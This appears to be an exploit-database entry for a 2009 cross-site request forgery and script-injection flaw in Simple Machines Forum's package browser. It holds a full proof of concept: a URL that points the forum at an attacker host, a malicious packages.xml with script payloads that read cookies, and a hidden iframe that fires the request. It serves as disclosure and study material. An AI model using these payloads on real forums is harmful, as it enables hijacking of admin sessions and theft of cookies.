header-logo
Suggest Exploit
vendor:
Simple Machines Forum (SMF)
by:
Xianur0
8.8
CVSS
HIGH
Cross-Site Request Forgery (XSRF)
352
CWE
Product Name: Simple Machines Forum (SMF)
Affected Version From: All
Affected Version To: All
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SMF XSRF PoC By Xianur0

Xianur0 discovered a Cross-Site Request Forgery (XSRF) vulnerability in Simple Machines Forum (SMF). The vulnerability is located in the file Sources/PackageGet.php and allows an attacker to inject malicious code into the packages.xml file. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site when the malicious packages.xml file is loaded by the admin. The attacker can also use an iframe to load the malicious packages.xml file.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version.
Source

Exploit-DB raw data:

Author: Xianur0
Vulnerable Version: All

The Bug is located in the file: Sources/PackageGet.php

Example:
http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com

When the admin link between the SMF to load the file:

http://attacker.com/packages.xml

Save this file as packages.xml

<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF SMF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

<package-list xmlns="http://www.simplemachines.org/xml/package-list"
xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>

<section>
    <title>SMF XSS PoC By Xianur0</title>
    <text><![CDATA[<script>alert('XSS')</script>]]></text>
    <modification>
        <id>Xianur0:XSMF</id>
        <name>SMF PoC By Xianur0</name>
        <filename>smfexploit.zip</filename>
        <version>0.1</version>
        <author email="uxmal666@gmail.com">Xianur0</author>
        <description><![CDATA[<script>alert(document.cookie)</script>]]></description>
    </modification>
</section>
</package-list>

and generate the XSRF:

<iframe src ="http://victim.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com"
width="0%" scrolling=no width=0%></iframe>

# milw0rm.com [2009-01-26]